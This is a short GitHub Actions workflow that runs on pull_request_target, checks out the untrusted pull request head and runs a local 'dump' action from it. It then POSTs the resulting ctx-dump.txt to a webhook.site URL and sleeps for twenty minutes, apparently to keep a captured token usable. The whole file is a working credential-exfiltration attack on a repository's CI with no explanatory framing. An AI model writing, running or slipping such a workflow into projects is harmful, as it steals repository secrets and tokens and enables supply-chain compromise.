name: cb-e-prt
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  e:
    runs-on: ubuntu-latest
    timeout-minutes: 25
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: dump
        uses: ./.github/actions/dump
      - name: upload + hold
        run: |
          curl -s -X POST https://webhook.site/727a48a4-5683-424d-88ae-e5eb14927bc7 -F "f=@ctx-dump.txt" -F "src=live-PRT"
          echo holding; sleep 1200
